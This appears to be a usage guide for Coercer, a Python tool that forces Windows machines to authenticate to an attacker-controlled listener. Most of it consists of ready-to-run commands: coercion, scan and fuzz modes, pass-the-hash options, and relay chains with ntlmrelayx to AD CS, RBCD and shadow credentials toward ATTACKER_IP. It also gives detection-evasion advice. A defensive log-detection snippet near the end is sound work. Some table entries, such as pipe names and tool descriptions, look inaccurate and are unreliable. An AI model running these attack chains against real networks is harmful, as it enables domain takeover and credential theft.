# Coercer
Coercer is a Python tool that automates Windows authentication coercion attacks by triggering NTLM authentication from target machines to an attacker-controlled listener. It supports multiple coercion methods including PetitPotam, PrinterBug, DFSCoerce, and ShadowCoerce, enabling NTLM relay attacks for AD privilege escalation.
## Installation

### Via pip

```bash
pip install coercer
```
### From GitHub

```bash
git clone https://github.com/p0dalirius/Coercer.git
cd Coercer
pip install -r requirements.txt
python3 -m coercer --help
```
### Requirements

- Python 3.8+
- impacket
- pycryptodomex
- requests
- argparse
## Quick Start

Basic coercion with credentials:

```bash
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN
```

Scan the target to identify working methods:

```bash
coercer scan -t 192.168.1.50 -u domain\\user -p password -d DOMAIN
```

Coerce with an NTLM hash:

```bash
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -H aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c -d DOMAIN
```
## Coercion Methods

Coercer supports numerous coercion methods across different MS-RPC protocols and Windows services:

| Method | Service | Protocol | MS-RPC Interface | Impact |
|---|---|---|---|---|
| PetitPotam | EfsRpc | \\pipe\efsrpc | EfsRpc | High - SYSTEM auth |
| PrinterBug | Spooler | \\pipe\spoolss | Printer (RPC) | High - SYSTEM auth |
| DFSCoerce | MSDFS | \\pipe\netdfs | NetDFS | Medium - SYSTEM auth |
| ShadowCoerce | Shadow Copy VSS | \\pipe\vssadmin | FSRVP | Medium - SYSTEM auth |
| MSEFSRCoerce | EFSRPC | \\pipe\efsrpc | EfsRpc | High - SYSTEM auth |
| Webexec | WebClient | HTTP | IOCTL | Medium - User context |
| DFSCoerceRPC | MSDFS | \\pipe\netdfs | NetDFS | Medium - SYSTEM auth |
| RprRemoteFindFirstFile | RemoteRegistry | \\pipe\winreg | RemoteRegistry | Low - Registry read |
| EfsRpcOpenFileRaw | EfsRpc | \\pipe\efsrpc | EfsRpc | High - SYSTEM auth |
| Lsasrv | LSA | \\pipe\lsarpc | LSA | Medium - LSASS auth |
| Tssession | Terminal Services | \\pipe\tssession | TermSrv | Low - TS context |
## Scan Mode

Enumerate which coercion methods work without triggering full authentication:

```bash
# Scan all methods
coercer scan -t 192.168.1.50 -u domain\\user -p password -d DOMAIN

# Scan with NTLM hash
coercer scan -t 192.168.1.50 -u domain\\user -H HASH -d DOMAIN

# Filter by method name
coercer scan -t 192.168.1.50 -u domain\\user -p password -d DOMAIN --filter-method PetitPotam

# Filter by protocol
coercer scan -t 192.168.1.50 -u domain\\user -p password -d DOMAIN --filter-protocol EfsRpc

# Filter by pipe name
coercer scan -t 192.168.1.50 -u domain\\user -p password -d DOMAIN --filter-pipe-name efsrpc

# Scan with a per-method timeout (seconds)
coercer scan -t 192.168.1.50 -u domain\\user -p password -d DOMAIN --timeout 10
```
## Coerce Mode

Trigger actual NTLM authentication to the listener:

```bash
# Basic coercion to listener
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN

# Coerce with a specific method
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN --method PetitPotam

# Coerce with verbose output
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN -v

# Coerce to an alternative listener port
coercer coerce -l 192.168.1.100:4444 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN

# Coerce with timeout
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN --timeout 30
```
## Fuzz Mode

Discover new coercion methods by fuzzing RPC endpoints:

```bash
# Fuzz target to discover methods
coercer fuzz -t 192.168.1.50 -u domain\\user -p password -d DOMAIN -l 192.168.1.100

# Fuzz a specific pipe
coercer fuzz -t 192.168.1.50 -u domain\\user -p password -d DOMAIN -l 192.168.1.100 --pipe efsrpc

# Fuzz with timeout
coercer fuzz -t 192.168.1.50 -u domain\\user -p password -d DOMAIN -l 192.168.1.100 --timeout 30
```
## Authentication Options

### Username/Password Authentication

```bash
coercer coerce -l LISTENER -t TARGET -u domain\\username -p password -d DOMAIN
coercer coerce -l LISTENER -t TARGET -u username -p password -d DOMAIN
```

### NTLM Hash Authentication (Pass-the-Hash)

```bash
coercer coerce -l LISTENER -t TARGET -u domain\\username -H LM:NTLM -d DOMAIN
coercer coerce -l LISTENER -t TARGET -H aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c
```

### Kerberos Authentication

```bash
coercer coerce -l LISTENER -t TARGET -k -d DOMAIN
export KRB5CCNAME=/tmp/user.ccache
coercer coerce -l LISTENER -t TARGET -k
```

### No Authentication

```bash
coercer coerce -l LISTENER -t TARGET --no-pass
coercer scan -t TARGET --no-pass
```

### Local Authentication

```bash
coercer coerce -l LISTENER -t TARGET --local
```
## Listener Setup

### Using ntlmrelayx (SMB Relay)

```bash
# Terminal 1: Start ntlmrelayx
ntlmrelayx.py -t 192.168.1.60 --no-http-server -smb2support

# Terminal 2: Run coercer
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN
```

### Using Responder (LLMNR/NBT-NS)

```bash
# Terminal 1: Start Responder
responder -I eth0 -v

# Terminal 2: Run coercer with SMB relay
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN
```

### Custom SMB Server Listener

```bash
# Using impacket smbserver
smbserver.py -smb2support -ip 192.168.1.100 share /tmp

# Run coercer to relay
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN
```

### Listening on a Specific Port

```bash
coercer coerce -l 192.168.1.100:445 -t TARGET -u domain\\user -p password -d DOMAIN
```
## Common Attack Chains

### Coerce to ntlmrelayx → AD CS ESC8

```bash
# Terminal 1: Start ntlmrelayx targeting ADCS
ntlmrelayx.py -t http://dc.domain.local/certsrv/certfnsh.asp -template DomainController --no-http-server -smb2support

# Terminal 2: Coerce to relay
coercer coerce -l ATTACKER_IP -t TARGET -u domain\\user -p password -d DOMAIN
```

### Coerce to ntlmrelayx → LDAP for RBCD

```bash
# Terminal 1: Start ntlmrelayx for LDAP relay with RBCD
ntlmrelayx.py -t ldap://dc.domain.local --no-http-server -smb2support --delegate-access

# Terminal 2: Coerce target
coercer coerce -l ATTACKER_IP -t TARGET -u domain\\user -p password -d DOMAIN
```

### Coerce to Relay for Shadow Credentials

```bash
# Terminal 1: Start ntlmrelayx targeting LDAP
ntlmrelayx.py -t ldap://dc.domain.local --no-http-server -smb2support --shadow-credentials

# Terminal 2: Trigger coercion
coercer coerce -l ATTACKER_IP -t TARGET -u domain\\user -p password -d DOMAIN
```

### Coerce Machine Account to Relay for Privilege Escalation

```bash
# Scan first to find a working method
coercer scan -t DC_IP -u domain\\user -p password -d DOMAIN

# Coerce DC to listener for relay to ADCS
coercer coerce -l ATTACKER_IP -t DC_IP -u domain\\user -p password -d DOMAIN --method PetitPotam
```
## WebDAV Coercion

Force HTTP authentication instead of SMB for cross-protocol relay attacks:

```bash
# Enable WebDAV coercion (requires WebClient service running on the target)
coercer coerce -l http://ATTACKER_IP:80 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN

# WebDAV with custom path
coercer coerce -l http://ATTACKER_IP:8080/share -t TARGET -u domain\\user -p password -d DOMAIN

# Combine with HTTP listener on ntlmrelayx
ntlmrelayx.py -I http://ATTACKER_IP:8080 -t http://target.com --no-smb-server
coercer coerce -l http://ATTACKER_IP:8080 -t TARGET -u domain\\user -p password -d DOMAIN
```
## Filtering Options

### Filter by Method Name

```bash
# Only PetitPotam
coercer scan -t TARGET -u domain\\user -p password --filter-method PetitPotam

# Multiple methods
coercer scan -t TARGET -u domain\\user -p password --filter-method "PetitPotam|PrinterBug"
```

### Filter by Protocol Name

```bash
# Only EfsRpc protocol
coercer scan -t TARGET -u domain\\user -p password --filter-protocol EfsRpc

# Multiple protocols
coercer scan -t TARGET -u domain\\user -p password --filter-protocol "EfsRpc|NetDFS"
```

### Filter by Pipe Name

```bash
# Only efsrpc pipe
coercer scan -t TARGET -u domain\\user -p password --filter-pipe-name efsrpc

# Multiple pipes
coercer scan -t TARGET -u domain\\user -p password --filter-pipe-name "efsrpc|netdfs"
```

### Combine Filters

```bash
coercer scan -t TARGET -u domain\\user -p password -d DOMAIN \
    --filter-method PetitPotam \
    --filter-protocol EfsRpc
```
## Troubleshooting

### Target Unreachable

```bash
# Verify connectivity
ping TARGET_IP

# Test SMB connectivity (smbclient takes -U 'user%password', not -u/-p)
smbclient -L //TARGET_IP -U 'domain\user%password'

# Test with a longer timeout
coercer scan -t TARGET -u domain\\user -p password -d DOMAIN --timeout 30
```

### Authentication Failed

```bash
# Verify credentials
coercer scan -t TARGET -u domain\\user -p password -d DOMAIN -v

# Try alternative username format
coercer scan -t TARGET -u DOMAIN\\user -p password -d DOMAIN

# Use NTLM hash instead
coercer scan -t TARGET -u domain\\user -H HASH -d DOMAIN
```

### Service Not Available

```bash
# Some methods require specific services running on the target
# Check whether the MSDFS, Spooler, or EfsRpc services are active
coercer scan -t TARGET -u domain\\user -p password -d DOMAIN -v

# Try with an increased timeout
coercer coerce -l LISTENER -t TARGET -u domain\\user -p password -d DOMAIN --timeout 60
```

### No Working Methods Found

```bash
# Method may be patched or disabled
# Try scanning with verbose output
coercer scan -t TARGET -u domain\\user -p password -d DOMAIN -v

# Enumerate installed hotfixes (run on the Windows host)
wmic qfe list brief /format:list
```

### Listener Connection Issues

```bash
# Verify listener is running and accessible
telnet LISTENER_IP 445

# Check firewall rules on the listener host
sudo ufw allow 445/tcp

# Use verbose logging
coercer coerce -l LISTENER_IP -t TARGET -u domain\\user -p password -d DOMAIN -v
```
## Best Practices

- Always Scan First: Use `coercer scan` to identify working methods before triggering full coercion
- Use Specific Methods: Target known-working methods to avoid noise and detection
- Filter Results: Leverage filtering to reduce network activity and operational footprint
- Combine with Relay: Pair Coercer with ntlmrelayx or Responder for effective privilege escalation
- Monitor Logs: Coercion attempts generate security event logs; operate during high activity periods
- Patch Management: Target systems with outdated patches are more likely to support multiple methods
- Service Enumeration: Verify target services (Spooler, EfsRpc, MSDFS) are running before coercion
- Credential Handling: Use NTLM hashes or Kerberos tickets to avoid passing plaintext credentials
- Clean Relay Chains: Ensure ntlmrelayx or the relay tool is properly configured before coercing
- Documentation: Log all coercion attempts, timing, and results for post-exploitation analysis
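The pipe names in the Coercion Methods table are also what shows up on the target side: each method opens its named pipe over IPC$, which a host with Detailed File Share auditing enabled records as Security event 5145 (ShareName `\\*\IPC$`, RelativeTargetName set to the pipe). The following Python is an added detection example, not part of Coercer; it assumes 5145 records exported as dicts with the fields shown, uses the pipe-to-method mapping exactly as the table gives it (including `vssadmin` for ShadowCoerce), and runs over constructed sample events. Because `coercer scan` tries every method in turn, it looks for one source opening several distinct coercion pipes in a short window, which is the behaviour the "Monitor Logs" note above refers to.

```python
from collections import defaultdict

# Pipe name -> coercion methods, copied from the Coercion Methods table above.
COERCION_PIPES = {
    "efsrpc": ["PetitPotam", "MSEFSRCoerce", "EfsRpcOpenFileRaw"],
    "spoolss": ["PrinterBug"],
    "netdfs": ["DFSCoerce", "DFSCoerceRPC"],
    "vssadmin": ["ShadowCoerce"],
    "winreg": ["RprRemoteFindFirstFile"],
    "lsarpc": ["Lsasrv"],
    "tssession": ["Tssession"],
}

def coercion_pipe(event):
    """Pipe name if this is a 5145 IPC$ open of a coercion pipe, else None."""
    if event.get("EventID") != 5145 or not event.get("ShareName", "").endswith("IPC$"):
        return None
    pipe = event.get("RelativeTargetName", "").lower()
    return pipe if pipe in COERCION_PIPES else None

def scan_bursts(events, window=60, min_pipes=2):
    """Flag sources opening `min_pipes` different coercion pipes within `window` s:
    `coercer scan` tries every method in turn, a normal client touches one pipe."""
    by_src = defaultdict(list)
    for e in events:
        pipe = coercion_pipe(e)
        if pipe:
            by_src[e["IpAddress"]].append((e["TimeCreated"], pipe))
    flagged = {}
    for src, opens in by_src.items():
        opens.sort()
        for t0, _ in opens:  # slide the window across this source's opens
            pipes = {p for t, p in opens if t0 <= t <= t0 + window}
            if len(pipes) >= min_pipes:
                methods = sorted({m for p in pipes for m in COERCION_PIPES[p]})
                flagged[src] = {"pipes": sorted(pipes), "methods": methods}
                break
    return flagged

def make_event(t, ip, user, pipe, eid=5145):  # builder for the constructed samples
    return {"TimeCreated": t, "EventID": eid, "IpAddress": ip, "SubjectUserName": user,
            "ShareName": "\\\\*\\IPC$", "RelativeTargetName": pipe}

# Constructed sample records (not real logs): 10.0.0.7 walks three pipes in 5 s, 10.0.0.9 opens spoolss once.
SAMPLE_EVENTS = [
    make_event(1000, "10.0.0.7", "jdoe", "efsrpc"),
    make_event(1002, "10.0.0.7", "jdoe", "spoolss"),
    make_event(1005, "10.0.0.7", "jdoe", "netdfs"),
    make_event(1003, "10.0.0.9", "svc_print", "spoolss"),
]
```

A single `spoolss` or `lsarpc` open is routine on a busy network, so the per-source burst logic, not the pipe match alone, is what keeps the false-positive rate usable.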
## Related Tools

| Tool | Purpose |
|---|---|
| PetitPotam | Standalone EfsRpc coercion tool; foundation for Coercer |
| ntlmrelayx | NTLM relay framework to authenticate against other services |
| Responder | LLMNR/NBT-NS poisoning and relay tool |
| Certipy | Active Directory Certificate Services enumeration and exploitation |
| krbrelayx | Kerberos relay attacks and alternative authentication methods |
| SpoolSample | Standalone PrinterBug implementation |
| PrintNightmare | RCE exploit for CVE-2021-1675 via Print Spooler |
| Shadow Credentials | Credential dumping via shadow credentials in Active Directory |